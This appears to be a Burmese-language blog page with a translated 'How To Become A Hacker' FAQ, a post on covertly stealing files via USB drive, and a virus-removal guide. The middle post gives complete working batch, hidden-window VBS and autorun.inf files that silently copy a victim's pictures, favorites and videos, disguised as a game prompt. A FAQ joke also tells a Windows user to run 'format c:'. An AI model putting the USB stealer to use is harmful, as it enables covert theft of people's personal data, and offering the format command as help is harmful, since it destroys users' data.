အများကြီးရှိနေတယ်လေ။ အားလုံး အဆင်ပြေရစေမယ်။ ဟုတ်ပပြီ ဟက်ကာ ဖြစ်ချင်သူတွေအတွက် နောက်ထပ် လေ့လာစရာတခုကတော့ World Wide Web ကြီးပေါ့။ Browser တစ်ခုခုကို သုံးတတ်ရမယ်နော် (အဲဒါကလူတိုင်းလုပ်တတ်တယ်)၊ HTML ရေးတတ်ဖို့တော့ အရင်လေ့လာရမယ်။ ဘာ language မှ မတတ်တဲ့သူအတွက် HTML ကို စလေ့လာလိုက်ရင် သင်ယူတဲ့နေရာမှာ အလေ့အကျင့်ကောင်းတွေ ရစေမယ်။ အကူအညီ အများကြီး ဖြစ်စေမှာပါ။ သင့်ရဲ့ကိုယ်ပိုင် home page တစ်ခုကို HTML နဲ့ရေးကြည့်သင့်ပါတယ်။ ပြီးရင် XHTML ဆိုတဲ့ဆီလေးကိုကူးကြည့်။ ဒါနဲ့ဟက်ကာဖြစ်မယ်ထင်လို့လား။ Website တစ်ခုရေးနိုင်ပြီဆိုရင်တောင်မှ Hacker ဆိုတဲ့ စကားလုံးနဲ့ သင်နဲ့ အဝေးကြီးပါ.. ။ ဘာလို့လည်းဆိုတော့ Web ပေါ်မှာ website တွေများများလွန်းလို့.. ဒါပေမယ့် အများစုက ရည်ရွယ်ချက်ကောင်းကောင်းလည်းမရှိ တည်ဆောက်ထားပုံကလည်း ညံ့မှညံ့။ သင့်ရဲ့ page မှာတော့ content တွေကို ကောင်းကောင်းထည့်ရမယ်.. စိတ်ဝင်စားစရာ ကောင်းအောင်ရေးရမယ်။

ပြသနာတခု ထပ်တွေ့ပြန်ပြီ သင့်ရဲ့ English စာတတ်မြောက်မှု အဆင့်အတန်းက စကားပြောတော့မယ်။ Internet နဲ့ Hacking နယ်ပယ်ထဲမှာ English စာကပဲလွမ်းမိုးထားဆဲပါပဲ။ Hacker Community ထဲမှာ ၀င်ဆံ့ဖို့အတွက် ကောင်းမွန်တဲ့ English စာတစ်ခုကိုတော့ သင်ပိုင်ဆိုင်ဖို့လိုတာအမှန်ပါပဲ။ အဓိကအကြောင်းအရာကတော့ အသုံးပြုရတဲ့ နည်းပညာဆိုင်ရာ ဝေါဟာရတွေက English ကိုသုံးမှသာ အဆင်ပြေတာများပါတယ်။ နည်းပညာ ပိုင်းဆိုင်ရာ ဘာသာပြန်စာအုပ်တွေရှိပေမယ့် အဲဒါတွေဟာ အမှန်တကယ်တော့ စိတ်ကျေနပ်စရာ မကောင်းပါဘူး။ သူများရေးထားတဲ့ code ထဲမှာပါလာမယ့် comment တွေကို ကောင်းကောင်းနားလည်နိုင်ဖို့ဆိုတာလည်း သင် English စာတတ်မှဖြစ်မှာပေါ့။ Native English Speaker တစ်ယောက် တောင်မှ တခါတရံမှာ Hacker တစ်ယောက်ဖြစ်နိုင်ဖို့အတွက် လုံလောက်တဲ့ Language Skills ရှိမယ်လို့ ဘယ်သူမှအာမမခံနိုင်ဘူး.. သင်ဆိုရင်ရောဘယ်လိုလဲ..။ ကြိုးစားနိုင်မှာ တော်ရုံလောက်ရမယ်ထင်တယ်နော်။ သင့်ရဲ့ အရေးအသားက ညံ့မယ်။ Grammer လဲမကျဘူး.. ၊ သတ်ပုံအမှားကလည်းများမှများဆိုရင် ဘယ်ဟက်ကာ ကမှ သင့်ရေးတာကို ဖတ်ချင်စိတ်ရှိမှာ မဟုတ်ဘူးလေ.. ။ ကဲ အခုပဲ စကြိုးစားပေတော့။
 Hacker Culture ဆိုတာလည်း ရှိပါသေးတယ်။ စိတ်ဝင်စားစရာ ပြသနာတွေကိုသင်ကဖြေရှင်းမယ်။ ရလာတဲ့ သင့်ရဲ့ Solution တွေက တကယ်ကောင်းရဲ့လားဆိုတာ သင့်ရဲ့ အပေါင်းအသင်းတွေ ဆရာတွေက အဆုံးအဖြတ်ပေးနိုင်ပါလိမ့်မယ်။မှတ်သားထားရမယ့်တစ်ခုက သင့်ကိုယ်သင် Hacker လို့သတ်မှတ်ထားတာဆိုရင်အဲဒါက သံသယဖြစ်စရာကောင်းပါသေးတယ်။ တခြားဟတ်ကာအစစ်တွေက သင့်ကို ဟတ်ကာ ပါလို့ အသိအမှတ်ပြုမှသာ သင်တကယ်ဖြစ်တာပါ။ သင့်ရဲ့ တတ်မြောက်မှုကို အခြားသူတွေသိဖို့ Reputation ကောင်းလာဖို့ဆိုတာ သင့်အနေနဲ့တခြားသူတွေကို ကူညီဖို့လိုပါတယ်။ Open Source Software တွေရေးကို ရေးရပါမယ်။ အဲဒါက အခြေခံအကျဆုံးပါပဲ။ သင်ရေးပြီးရင်လည်း တခြား ဟတ်ကာတွေ လေ့လာသူတွေအတွက် ပြန်အသုံးပြုနိုင်ဖို့ပဲဖြစ်ဖြစ် Soruce တွေကိုချပြရပါမယ်။ အဲဒီ Software မျိုးကို လူတွေက Free Software လို့ခေါ်တတ်ကြပါတယ်.. တကယ်တော့ Open Source Software လို့ပဲသုံးတာကောင်းပါတယ်။ ဒါပေမယ့် သမိုင်းထဲမှာတော့ 1996 ခုနှစ်ပိုင်းလောက်အထိတော့ ဟက်ကာဆိုတာ Closed Program Closed Source တွေပဲရေးသားခဲ့တာပါ။ 1997 နောက်ပိုင်းကြမှ ဒီ Culture ကပြောင်းလဲလာတာလို့ဆိုနိုင်ပါတယ်။ Hacker Community နဲ့ Open Source Developers ဆိုတာ ယနေ့ခေတ်မှာတော့ တူညီတဲ့ Culture ရှိလာနေပါပြီ။ သင်ဟာ Newbie တစ်ယောက်ဖြစ်ရင်တော့ ကူညီရေးသားခြင်းကနေအစပြုသင့်ပါတယ်။ သင်စိတ်ဝင် စားတဲ့ အပိုင်းတစ်ခုကိုရွေးပြီး လုပ်သင့်ပါတယ်။ သူ့ရဲ့ progress က Program တွေကိုကူညီစမ်းပေးမယ်။ ကူညီအမှားရှာပေးမယ်။ ကူညီပြီး modify လုပ်ပေးမယ်…အဲဒီလိုပေါ့။ အဲဒီလိုလေ့လာရင်းနဲ့ အများကြီး သင်သိလာပါလိမ့်မယ်။ နောက်တခု အရေးကြီးတယ်နော် သင့်ကို နောက်ပိုင်းမှာ ပြန်ကူညီမယ့်သူတွေနဲ့ Karma ကောင်းကောင်းဖြစ်စေမှာပါ။

စိတ်ဝင်စားစရာကောင်းပြီး အသုံးဝင်တဲ့ အချက်အလက်တွေကို လူတွေကို ပြောပြတဲ့သူ ဖြစ်ရင် ကောင်းပါတယ်။ ဥပမာ FAQs လိုဟာမျိုးတွေ သင်လုပ်သင့်ပါတယ်။ ဒါမှသင့်ကို လူတွေ ပိုလေးစားလာမှာပေါ့။ ဟက်ကာတွေမှာ ခေါင်းဆောင်ရယ်လို့ ရှိလေ့မရှိပါဘူး။ အတူတကွပူးပေါင်းလုပ်ဆောင်ခြင်းကိုဦးစားပေးပါတယ်။
အခုကျွန်တော် Hacker Mindset အကြောင်းပြောချင်ပါတယ်။ ကွန်ပျူတာရှေ့မှာ်မရှိနေတဲ့အချိန် ဟက်ကာအများစုလုပ်လေ့ရှိတဲ့အရာတွေကိုလမ်းညွန်ချင်တာပါ။ သင်လည်းလုပ်ချင်ရင်လုပ်လို့ရတာပေါ့။ သင့်ရဲ့မိခင်ဘာသာစကားကို ကျွမ်းကျင်စွာ ရေးသားပြောဆိုနိုင်ပါစေ။ သင်သိရဲ့လား ဟက်ကာတွေက စာရေးအင်မတန်ကောင်းတဲ့သူတွေပါတဲ့။ Science Fiction တွေကို ဖတ်ပါ။ Martial-art တစ်ခုခုကိုလေ့ကျင့်ပါ။ ဟက်ကာတွေ့လေ့ကျင့်ကြတာတွေရှိတယ် ကရာတေး တိုက်ကွန်ဒို ကွန်ဖူးတွေလေ။ သေနတ်ပစ်တာလည်းကောင်းပါတယ်။ တရားဥပဒေနဲ့ ညှိမယ်နော်…. Tongue ။ တေးဂီတကို ခံစားတတ်ပါစေ။ Muscial Instrument တခုခုကို တီးတတ်ရင် ကောင်းပါတယ်။ ဒါတွေက အရမ်းကြီး အရေးမပါပေမယ့် တစုံတရာကောင်းကျိုးတော့ ပေးနိုင်ပါလိမ့်မယ်။ ကိုယ့်ကိုယ်ကိုယ် ကျဉ်းမြောင်းတဲ့ ကျွမ်းကျင်မှုတွေနဲ့ မကျေနပ်နေပါနဲ့။ ဟက်ကာအများစုက အများအမြင်မှာတော့ Programmer တွေပါပဲ။ ဒါပေမယ့် ဟက်ကာအစစ်တွေက တခြားဆက်နွယ်တဲ့ အပိုင်းတွေမှာလဲ ကျွမ်းကျင်သူတွေပါ။ System Administration, web design ပြီးတော့ PC Hardware troubleshooting အစရှိတဲ့အပိုင်းတွေကိုလည်း ကျွမ်းကျင်ကြပါတယ်။ System Administrator လို့ပြောတဲ့ ဟက်ကာတယောက်က Script Programming နဲ့ Webdesign အပိုင်းတွေမှာလဲ Skill ကောင်းကောင်းရှိပါတယ်။ ဒါပေမယ့် သူတို့တွေက ယောင်ဝါးဝါးတွေတော့ မဟုတ်ကြဘူးနော်… သူတို့ အကျွမ်းကျင်ဆုံးအရာဆိုပြီးတော့ သီးသန့်လည်း ရှိပါတယ်။ ကျွန်တော်ရဲ့ ဒီဆောင်းပါးကို သင်ဖတ်ပြီးရင်သင် ကျွန်တော့်ကိုမေးခွန်းတွေ ထပ်မေးချင်မှာ သေချာသလောက်ရှိပါတယ်။ အဲဒီမေးခွန်းတွေကို တခါတည်း ကျွန်တော် ဖြေပေးလိုက်ပါမယ်။

Q: ကျွန်တော် ဟက်ကာတယောက်ဖြစ်ပြီဆိုတာ ဘယ်လိုသိနိုင်မလဲ ?
A: *သင် Coding တွေကို အရမ်းကိုကျွမ်းကျွမ်းကျင်ကျင်ရေးနိုင် ဖတ်နိုင် အသုံးချနိုင်နေပြီလား?
* Hacker Community ရဲ့ ရည်ရွယ်ချက်တွေနဲ့ တန်ဖိုးရှိမှုတွေကို သေချာသဘောပေါက်နားလည်လား?
* Hacker Community ထဲက Senior Member တစ်ယောက်ကသင့်ကို ဟက်ကာလို့ခေါ်လား။
ဒီသုံးခုစလုံး သင်က ဟုတ်တယ်ဆိုရင် တော့ သင်ကဟက်ကာပေါ့.. နှစ်ခုလောက်ပဲမှန်သေးရင်တော့ မဟုတ် သေးပါဘူး .. ကြိုးစားလိုက်ဦးနော်။

Q: ဘယ်လိုဟက်ကင်းလုပ်ရတယ်ဆိုတာ ကျွန်တော့်ကိုသင်ပေးမှာလား?
A: ကျွန်တော်ဒါရေးရင်ဒီလိုအပြောခံရမယ်ဆိုတာသိတယ်။ ကျွန်တော့်မှာ သင့်ကိုသင်ပေးဖို့အချိန်လည်းမရှိဘူး.. Energy တွေကိုလည်းအသုံးမချနိုင်ဘူး ကျွန်တော့်ရဲ့ ကိုယ်ပိုင် Project တွေနဲ့ကို ကျွန်တော့ ရဲ့ အချိန် 110 % လောက် ကုန်နေ ရလို့ပါဗျာ။ထားပါတော့ ကျွန်တော်ကသင်ပေးမယ်ပဲ..။ ခက်တာက Hacking ဆိုတာ ကိုယ့်ဟာကိုယ် သင်ယူရမယ့် attitude နဲ့ Skill ဖြစ်နေတာဗျ။ သင်အဲဒီလိုသာ သူများကိုသင်ပေးဖို့လိုက်ပြီးပြောနေရင် ဘယ်ဟက်ကာမှသင့်ကိုလေး စားမှာမဟုတ်ဘူး။ စိတ်မဆိုးနဲ့ ချစ်လို့ပြောတာ။ Tongue (ကျွန်တော်လည်းဟက်ကာမဟုတ်ပါ)
 

Q: ဒါဖြင့်ရင် ကျွန်တော်ဘယ်လိုစရမှာလဲ?
A: Linux User Group တစ်ခုခုအရင်ရှာပြီးရင်အကူအညီတောင်းအရင်ဆုံး Linux တစ်ခု install လုပ်လိုက်တာ အကောင်း ဆုံးဖြစ်မယ်ထင်တယ်။ အလွယ်ဆုံးကိုပြောကြည့်တာပါ။
Q: ကျွန်တော်စဖို့နောက်များကျနေပြီလားမသိဘူးနော် ?
A: သင်စိတ်အားထက်သန်နေတဲ့အချိန်ဆိုရင် အခုပဲစတာကောင်းပါတယ်။ လူအများစုကတော့ 15 ကနေ 20 ကြားထဲမှာ စ ကြတာပဲဗျ။ ဒါပေမယ့် မတူဘူးပေါ့တစ်ယောက်နဲ့တစ်ယောက်ကတော့။
Q: ကျွန်တော် Hack နိုင်ဖို့ဘယ်လောက်ကြာမလဲဟင်?
A: သင့်မှာ အရည်အချင်း(Talent) ဘယ်လောက်ရှိတဲ့ ဘယ်လောက်ကြိုးစားလဲဆိုတဲ့ပေါ်မှာပဲမူတည်မှာပေါ့ဗျာ။ တစ်နှစ်ခွဲ နှစ်နှစ်လောက်တစ်စိုက်မက်မက် မရပ်မနားလေ့လာရင် တော့ ဖြစ်သွားကြတာပါပဲ။ ဒီလောက်နဲ့တော့မပြီးဘူးနော် တ ကယ့် Master ဖြစ်ချင်ရင်တော့ ဆယ်နှစ်အနည်းဆုံးပဲ။ ဟက်ကာအစစ်တစ်ယောက်ဖြစ်သွားပြန်ရင်လည်း နောက်ကျ ကျန်မနေအောင်တော့ တစ်သက်လုံးလေ့လာရတော့မှာပေါ့။
Q: Visual Basic နဲ့ကျွန်တော်စလိုက်ရင်ဘယ့်နှယ့်လဲ?
A: ဒီလိုမေးရင်တော့ သင် Microsoft Windows နဲ့နှစ်ပါးသွားချင်ပြီထင်တယ်။ ကောင်းမွန်တဲ့ စိတ်ကူးတစ်ခုတော့ မဟုတ်
ဘူးနော်။ မလုပ်ပါနဲ့လားဗျာ.. ။ အဲဒါရုပ်ဆိုးလွန်းပါတယ်။ Python တို့ C တို့ ကို ကျွန်တော် recommend လုပ်ထား
တယ်လေ။ ပိုသင့်တော်လို့ပြောတာပါဗျာ။ အသေးစိတ်တော့မပြောနိုင်တော့ဘူး။
Q: ကျွန်တော် System တခုကို Crack လုပ်ချင်လို့ ကူညီပါလားဗျာ..။ ဒါမှမဟုတ်သင်ပေးပါလား ?
A: ဆိုးပါတယ်ဗျာ။ဒီ FAQ တွေကိုဖတ်ပြီးတာတောင်သင်ဒါမျိုးမေးဦးမယ်ဆိုရင် သင်ဟာ educable မဖြစ်သေးဘူး တော်တော်လေးကို stupid ဖြစ်တာပဲဗျာ။ ဒါမျိုးကို Email နဲ့ မေးရင်လည်း ကျွန်တော်လျှစ်လျှူရှုထားမှာပဲ။
Q: ကျွန်တော်တခြားသူရဲ့ Gmail အကောင့်ရဲ့ password ဖြစ်ဖြစ်ပေါ့… အဲဒါဘယ်လိုယူလို့ရမလဲ ?
A: ပြသနာပဲ..။ အဲဒါ Cracking လို့ခေါ်တယ်ဗျ..။ အဲဒါမျိုးအားမပေးပါ။
Q: ကျွန်တော် Cracked လုပ်ခံလိုက်ရတယ်ဗျာ.. ။ ကူညီပေးပါ။
A: ဒါမျိုးမေးရင် သင်သုံးတာ Microsoft Windows ဖြစ်မယ်ထင်တယ်။ Windows System က ပုံမှန်အားဖြင့် Crack လုပ်တာကို ကောင်းကောင်း မကာကွယ်နိုင်ဘူးဗျ။ အကောင်းဆုံးက Linux ဖြစ်ဖြစ် well Design ဖြစ်တာ ပြောင်း သုံးဗျာ။
Q: ကျွန်တော့် Windows မှာ ပြသနာဖြစ်နေပြီ။ ကူပါဦး?
A: ကောင်းပြီလေ။ CMD ဖွင့်ပြီး.. “format c:” လို့ရိုက်လိုက်ပါ။ မိနစ်အနည်းအငယ်အတွင်းအားလုံး အဆင်ပြေသွားလိမ့်မယ်။
Q: ဟက်ကာအစစ်တွေနဲ့ ဘယ်နားမှာတွေ့နိုင်မလဲ?
A: သင့်ပြည်တွင်းက Unix or Linux user group တွေရှာပြီး တွေ့လို့ရတယ်လေ။ IRC နဲ့ Gtalk လိုဟာမှာတော့ မတွေ့နိုင်လောက်ဘူးနော်..။
Q: ဟက်ကာဖြစ်ဖို့ Maths ကောင်းစရာလိုလားမသိဘူး?
A: ကောင်းစရာတော့မလိုပါဘူး..။ trigo တို့ calculus တို့မလိုလောက်ပါဘူး.. (ချွင်းချက်ရှိနိုင်သည်) formal logic နဲ့ Boolean algebra တွေတော့လိုလိမ့်မယ်။ အဓိကက logical ကျကျတွေးနိုင်ရမယ်။ reasoning ကောင်းရမယ်။ intelligence ရှိရမယ်။
Q: ကျွန်တော် စလုပ်ချင်နေပါပြီ..။ စလုပ်ဖို့ တခုခုပေးပါ။
A: သင့်ရဲ့ စိတ်ဝင်စားမှုနဲ့ Talent ကိုမသိပဲကျွန်တော်ဘာမှလုပ်ပေးလို့မရပါဘူး ကိုယ့်ကိုယ်ကိုယ် ယုံကြည်မှုနဲ့ ကိုယ့်အားကိုယ်ကိုးရမယ် သူများချပေးတဲ့လမ်းကြောင်းကိုလျှောက်ရင် အောင်မြင်မှုနဲ့ဝေးသွားမှာပေါ့ဗျာ။
Q: Mircrosoft ကိုမုန်းသင့်သလား?
A: Mircrosoft ကမုန်းစရာလားဗျာ။မုန်းမယ့်အစား ကိုယ်လုပ်စရာရှိတာသာလုပ်။
Q: Open Source ကြီးပဲရေးတော့ Programmer တွေရပ်တည်မှုအတွက် အဆင်ပြေပါ့မလား။?
A: မဟုတ်သေးဘူးဗျ။ Open Source Software Industry ရှိလာတဲ့အတွက် အလုပ်တွေပိုတိုးလာတာပဲ ရှိမယ်။ လျှော့မသွားဘူးလေဗျာ။ သူ့ဘာသူ open source ပဲဖြစ်ဖြစ် ရေးတဲ့သူက ပိုက်ဆံရမှာပဲလေ။ free software တွေဘယ်လောက်ပဲများများ သင်ပိုက်ဆံရမယ့်နည်းလမ်းရှိကိုရှိနေဦးမှာပါ။ သိပ်စိတ်ပူစရာမရှိပါဘူး။

ဝန်ခံချက်: Eric Steven Raymond ရေးသားသည့် How To Become A Hacker ကို အဓိကကိုးကား ရေးသားပါသည်။
အရေးအသားမကောင်းပါက ကျွန်တော်ညံ့သောကြောင့်ဖြစ်ပြီး.. ကောင်းပါက မူရင်းစာရေးဆရာ တော်သောကြောင့်သာဖြစ်ပါကြောင်း.. မူရင်းဆောင်းပါးကိုသွားဖတ်ဖို့လည်း တိုက်တွန်းပါတယ်ခင်ဗျာ။ Link:
Code:

http://www.donkboy.com/pages/hacker-howto.html 

Soruce; ငြိမ်းချမ်းလင်း ဘာသာပြန်ထားသည်ကို ကူးယူဖော်ပြသည်။

အပြည့်အစုံ

Sunday 19 September 2010

User တွေရဲ့ Data တွေကို USB Flash Drive နဲ့ ခိုးယူမယ်

သူများကွန်ပျူတာထဲက အချက်အလက်တွေကို USB flash Drive လေးထိုးလိုက်တာနဲ့ ယူလို့ရတယ်ဆိုတဲ့ နည်းလေးပါ။ ကိုယ်ကလည်းသူများ Computer တွေမှာ သုံးရင် USB flash Drive တပ်ထားလည်း အရင် စစ်ဆေးသင့် ပါတယ်။ မှတ်သား လေ့လာဖို့ပါ ခင်ဗျား။

ပထမဦးဆုံး 8GB ရှိတဲ့ USB flash Drive တစ်ခုကိုယူရပါမယ်။ ပြီးရင်တော့ အဲဒီထဲမှာ ဘာမှမရှိအောင် ရှင်းထားပေးရပါ့မယ်။ ဆိုလိုတာက Format ချလိုက်ပေါ့ဗျာ။

၁) အနေနဲ့ အဲဒီ USB Flash Drive ထဲမှာ Folder တစ်ခုကိုတည်ဆောက်ရပါ့မယ် နာမည်ကိုတော့ All လို့အမည်ပေးထားလိုက်ပါ။

၂) ကတော့ အောက်ပါကုဒ်လေးတွေကို ကူးယူပြီး File.bat ဆိုပြီးနာမည်ပေးလိုက်ပါ။ ပြီးရင်တော့ စောစော က USB flash Drive ထဲမှာသိမ်းလိုက်ပါ။ ပြီးရင်....



@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls




 

-----------------------------------------------
၃) အခုဖော်ပြမဲ့ ကုဒ်လေးတွေကိုတော့  Launch.bat လို့အမည်ပေးပြီး Drive ထဲမှာသိမ်းထားလိုက်ပါဗျာ


wscript.exe \invisible.vbs file.bat



 -----------------------------------------------------

၎) အနေနဲ့ကတော့ ..ဒီကုဒ်လေးတွေကို invisible.vbs လို့မည်ပေးပြီးတော့ သိမ်းလိုက်ပါဗျာ..
ကဲအားလုံးပြီးသွားရင်တော့ဗျာ

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False



 ---------------------------------------------

နောက်ထပ်သူတို့ ကို Run ဖို့က Autorun.inf ဆိုတဲ့ဖိုင်လေးလိုလာပါပြီး
Autorun ဖိုင်ကိုဒီလိုလေးရေးမယ်ဗျာ….

[autorun]
icon=drive.icon
open=launch.bat
action=Click ok to Run game for Windows
shell\open\command=launch.bat




ဒီ icon ဆိုတဲ့နေရာမှာ မိမိ ထည့်မည် icon လေးရဲ့နာမည်လေးပေးရမှာပါ ဥပမာ ကို့ Icon လေးရဲ့နာမည်က  USBFlashCardWithCardReader2  ဆိုရင်တော့ USBFlashCardWithCardReader2.icon လို့ ဖိုင်နာမည်ပေးရမှာပါ။ ဒီလောက်ဆို သဘောပေါက်မယ်လို့ ထင်ပါတယ်...
ဖိုင်တွေအားလုံးကို  Save  လုပ်တဲ့နေရာမှာ File type ကို All ထားပေးရမှာဖြစ်ပါတယ်။

ကဲအားလုံးပြီးသွားရင်တော့ My Computer ထဲက Drive ထဲမှာ လူကြီးမင်ရဲ့ Flash  Drive လေးကို Icon လှလှလေးနဲ့တွေ့နေရပြီး...

စမ်းသပ်လို့ရပါပြီခင်မျာ..ဖိုင်တွေကို All Folder ထဲမှာ သူအလိုလျှောက် ဆွဲထည့်ထားပါလိမ့်မယ်..

အပြည့်အစုံ

Computer ထဲက Virus တွေကို ဖျက်မယ်

တကယ်တမ်း ကွန်ပျူတာ ဗိုင်းရပ်စ် တွေကို ရှင်းလင်းရတယ်ဆိုတာ လွယ်ကူတဲ့ကိစ္စမဟုတ်သလို မိမိရဲ့ အဖိုးတန်တဲ့ အချိန်တချို့ကို ပေးဆပ်ကြရတာပါ။ ဘယ်ကွန်ပျူတာမှ Virus တစ်မျိုးတည်း ရတယ်ဆိုတာ မရှိပဲနဲ့ မိမိရဲ့အိမ်မှာ ပုရွက်ဆိတ်လေးတွေ ၀င်လာသလိုပါပဲ နောက်ဆုံး တပ်စုကြီးနဲ့ပဲ ပြန်လည် ထွက်ခွာသွားကြတာပါ။ Antivirus ဆိုတာ အကောင်းမွန်ဆုံး ကာကွယ်ရေး တပ်ဖွဲ့ကြီးဖြစ်တယ် သို့ပေမယ့်လည်း ၄င်း Antivirus က out of date ဖြစ်နေမယ်ဆိုရင် အသုံးဝင်တဲ့ antivirus program တစ်ခုဖြစ်လာမှာ မဟုတ်ပါဘူး။ ဒီတော့ virus တွေကို ခုခံတိုက်ခိုက်ဖို့၊ virus ရှိမရှိဆိုတာ သိဖို့အတွက် သံသယဖြစ်ဖွယ်ရာ processing တွေ၊ ဖိုင်တွေကို သိဖို့လိုပါတယ်။ ဒီလို ဒုက္ခပေးနိုင်တဲ့ virus တွေကို config, taskmanager နဲ့ autoruns tools တွေနဲ့ ရှာဖွေကြရတယ်။ ဒါကြောင့် သံသယ ဖြစ်ဖွယ် process တွေကို မိတ်ဆွေတို့အနေဲ့ ရှာတော့မယ်ဆိုရင် ဒီ file က ဘယ်ကလာတာလဲ၊ registry keys တွေအတွက် လေးလံစေတဲ့ ဖိုင်တွေလား၊ ဘယ်လို services တွေကို အသုံးပြုနေလဲ၊ ဘယ် startup program တွေထဲမှာ ဘယ်လိုဖိုင်တွေအနေနဲ့ ၀င်ရောက် အသုံးပြုနေလဲဆိုတာကို သိဖို့လိုပါတယ်။ အကယ်၍များ virus ကို ရှင်းလင်းလိုက်ဖို့ ၂ နာရီလောက် အချိန်ကြာမယ်ဆိုရင် အဲ့လိုရှင်းလင်းလိုက်ဖို့ထက် Operating System ကိုပြန်လည်၍ အသစ်တင်လိုက်မည်ဆိုသော အချက်နဲ့ ညှိနှိုင်းရပါလိမ့်မယ်။ ဒါက အချိန်ကုန်မခံစေချင်တဲ့အတွက် ကြောင့်ပင်ဖြစ်သည်။

Virus ရဲ့ အဓိပ္ပါယ်။...

အရိုးရှင်းဆုံး ဝေါဟာရတစ်ခုအနေနဲ့ Computer Virus ဆိုတာ သူကိုယ်တိုင် ဖိုင်တစ်ခုကို ဖန်တီးနိုင်တယ် ကူးယူနိုင်တယ်။ လုံခြုံရေး ဆိုင်ရာ program တွေကို စိန်ခေါ် ခြိမ်းခြောက်နိုင်တဲ့ အစွမ်းတွေရှိတယ်။ တစ်ချို့ virus တွေက သတ်မှတ်ထားတဲ့ ဖိုင်တွေကို delete လုပ်နိုင်တယ်၊ တစ်ချို့က user တွေ ကွန်ပျူတာရဲ့ password နဲ့ information တွေကို ခိုးယူနိုင်တယ်။ တစ်ချို့ကြပြန်တော့ မိမိရဲ့ ကွန်ပျူတာကို OS တက်မလာလောက်အောင် ဖျက်စီးမှု့လုပ်နိုင်ကြတယ်။
အကြမ်းဖျင်းအားဖြင့် -
Virus = ကိုယ်တိုင် copy ကူးယူနိုင်သော file တစ်ခု
Trojan = virus သို့မဟုတ် malware တွေပါဝင်သော program တစ်ခု
Spyware = ကွန်ပျူတာ ကိုထိန်းချူပ်ခွင့်ရရန် သိုမဟုတ် ကြားဖေါက်ဝင်ရောက်နိုင်အောင် ဖန်တီးထားတော့ ဖိုင် သို့မဟုတ် program တစ်ခု
Maleware = ကွန်ပျူတာအား ပိုင်ရှင်၏ ခွင့်ပြုချက်မရပဲ ပျက်စီးရာ ပျက်စီးကြောင်း ဖန်တီးနိုင်သော program
Worm = Network အပေါ်မှာ လမ်းသလားသော virus

Virus ဖယ်ရှားခြင်း။
မိမိကွန်ပျူတာမှာ virus ရှိသည်ဟု ယူဆပါက Up to Date ဖြစ်နေသော Antivirus program တွေနဲ့ စစ်ဆေးပေးပါ။ Antivirus program က detect သိလို့ ဖယ်ရှားနိုင်တယ်ဆို ရင်တော့ ကံကောင်းတာပေါ့။ AV တွေ Detect သိတယ်.. Remove မလုပ်နိုင်တော့ဘူးဆိုရင်တော့ ဖြစ်နေတဲ action နဲ့ file ကို မှတ်သားထားပါ .. ပြီးရင် Search Engine မှာ ၄င်းဖိုင် နဲ့ ၄င်း virus ရဲ့ ဒုက္ခပေးပုံတွေကို ပြောဆို အကူအညီတောင်းပါ။ ပြီးလျင်လမ်းညွန်အတိုင်းဖြေရှင်းမှာ။ ဖြေရှင်းမှု့မလုပ်ခင်တိုင်းမှာ မိမိရဲ့ အရေးကြီးတဲ့ ဖိုင်တွေကို backup လုပ်ထားပါ။

Virus Detect မသိခဲ့ရင်
ကွန်ပျူတာမှာ AntiVirus / AntiSpyware program တွေအနေနဲ့ Detect မသိဘူး သို့သော် ကွန်ပျူတာက အရင်အတိုင်းပဲ နှေးမြဲနှေးနေမယ်ဆိုရင်တော့ background processes တွေကို ကြည့်ရပါလိမ့်မယ်။ ဒီအတွက် special tool လေးတွေက အဓိက တာဝန်ထမ်းဆောင်ရလိမ့်မယ်။ ဥပမာ :- task manager, autoruns, process explorer and hijackthis တို့လိုပေါ့။

Checking Running Processes
ကျွန်တော်တို့ PC တစ်လုံး Error ဖြစ်တယ်ဆိုရင် ပထမဦးဆုံးအကြိမ် task manager (Ctrl + Alt+ Del) ကို ခေါ်ကြည့်တယ်. ပြီးရင် ဘယ်လို file နဲ့ services တွေ Run နေလဲ Memory usage တွေဘယ်လောက်များများကို ဘယ်လို file တွေက အသုံးပြုနေလဲဆိုတာကိုကြည့်မယ်။ ပြီးရင် System Configuration Ultility (RUN>msconfig) က နေဘယ် serivces တွေ နဲ့ ဘယ်ဖိုင်တွေက Operating System (Windows ) startup မှာ ၀င်ရောက်နေလဲဆိုတာကိုပါကြည့်ပါ။အကယ်၍ starup မှာ ထူးထူးခြားခြား file အမည်လေးတွေနဲ့ ၀င်နေတာတွေ့ရင်


တို့မှာသွားပြီး ဖိုင်အမည်ကို ရိုက်ထည့်စစ်ဆေးကြည့်ပါ။ ဘာကြောင့်လဲဆိုတော့ တစ်ချို့ ဖိုင်တွေက system file တွေနဲ့ပုံစံတူတွေဖြစ်နေတတ်တယ်။ မိမိကွန်ပျူတာအတွက် အရေးမပါတဲ့ processes တွေကို end လုပ်ပါ။

System Configuration Utility


RUN dialog box မှာ msconfig ဆိုပြီးတော့ ရိုက်ထည့်လိုက် ပြီးရင် System Configuration Utility ဆိုတာပေါ်လာမယ်... ဒါကတော့ Microsoft Windows မှာဆိုရင် အကောင်းဆုံး ကွန်ပျူတာကိုပြင်ဆင်မှု့ပိုင်းမှာ အထောက်အကူပြုတဲ့ utility ပဲဖြစ်တယ်။ နောက်ဆုံး ဘာမှမသိဘူးပဲထား startup tab မှာ Disable All ဆိုတာကို နိုပ်မယ်။ နောက် Services tab မှာ Hide All Microsoft Services ဆိုတာကို အမှန်ခြစ်မယ်. ပြီးရင် Disable All ဆိုပြီးနိုပ် restart လုပ်လိုက်ရင် မိမိရဲ့ ကွန်ပျူတာ system ဟာပုံမှန်ထက်သိသိသာသာကို ကောင်းမွန်လာတာကိုတွေ့ရလိမ့်မယ်။ ဒီပုံစံနဲ့ တစ်ခါတစ်လေ ဘာ error မှန်းမသိ (အထူးသဖြင့် Software Conflict ဖြစ်၍ windows normal ၀င်မရခြင်း) တဲ့ ပြဿနာတွေကို F8 နိုပ်ကာ Safe Mode ထဲကနေ ပြင်ပြီးသုံးသွားရင်တောင် အဆင်ပြေပါတယ်။

All-in-one diagnostic Tools
Autoruns


ဒီ software က Task manager, msconfig and the services list တွေ စသည့် system diagnostic အစုံပါတဲ့ freeware လေးတစ်ခုပါ။

Process Explorer

